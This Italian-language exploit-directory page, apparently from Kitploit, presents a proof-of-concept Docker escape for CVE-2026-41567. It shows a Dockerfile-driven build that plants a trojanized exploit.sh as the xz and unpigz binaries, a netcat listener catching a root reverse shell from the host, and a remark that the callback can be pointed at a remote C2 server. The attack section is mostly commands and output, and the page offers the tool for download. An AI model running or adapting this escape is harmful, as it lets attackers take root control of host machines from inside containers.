Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-41567 — Sfrutta la fuga da Docker tramite CVE-2026-41567 utilizzando binari xz/unpigz trojanizzati per ottenere una shell di root sull'host dall'interno di un container. | Kitploit
Strumenti/GitHubGitHub/berdav/cve-2026-41567
Analisi delle VulnerabilitàExploitEscape dal Container
GitHubberdav/cve-2026-41567

CVE-2026-41567

Sfrutta la fuga da Docker tramite CVE-2026-41567 utilizzando binari xz/unpigz trojanizzati per ottenere una shell di root sull'host dall'interno di un container.

Vedi Repository
1 giorno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-41567 1day

Questa è una dimostrazione di docker escape utilizzando xz / unpigz trojanizzati.

Può essere facilmente modificato per essere usato da remoto (ad es. basta modificare l'IP predefinito di docker con un C2 remoto).

Maggiori informazioni sull'exploit qui

PoC

Esegui un netcat in ascolto sulla porta 50005 sull'host

root@kitploit:~
ubuntu@ubuntu-noble:~/CVE-2026-41567$ nc -vlp  50005
Listening on 0.0.0.0 50005
Connection received on ubuntu-noble 35722
# whoami
root
# cat /etc/hostname
ubuntu-noble
# exit

Poi esegui lo script test.sh. Se l'exploit funziona, otterrai immediatamente una shell di root.

root@kitploit:~
ubuntu@ubuntu-noble:~/CVE-2026-41567$ sudo ./test.sh
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
            Install the buildx component to build images with BuildKit:
            https://docs.docker.com/go/buildx/

Sending build context to Docker daemon  19.97kB
Step 1/7 : FROM debian
 ---> 34cd9e9fd437
Step 2/7 : RUN apt update && apt install -y ncat
 ---> Using cache
 ---> c85c9eb10bff
Step 3/7 : COPY exploit.sh /usr/bin/xz
 ---> Using cache
 ---> b84efa8058e7
Step 4/7 : RUN chmod +x /usr/bin/xz
 ---> Using cache
 ---> 423b0e1891a6
Step 5/7 : COPY exploit.sh /usr/bin/unpigz
 ---> Using cache
 ---> 74eff85cf988
Step 6/7 : RUN chmod +x /usr/bin/unpigz
 ---> Using cache
 ---> 2f773fa12931
Step 7/7 : CMD [ "sleep", "9999999" ]
 ---> Using cache
 ---> 7b99f12dbe8d
Successfully built 7b99f12dbe8d
Successfully tagged cve-2026-41567:latest
cve-2026-41567
5679a4dc643c65a20039de693fad1f1caeea7fe5760b5c4049d1d4f37f5ab825
tar: Removing leading `/' from member names
/etc/hosts
Successfully copied 0B to cve-2026-41567:/tmp

Nota che devi avere i privilegi per comunicare con il demone Docker (di solito essere root).

Scarica lo strumento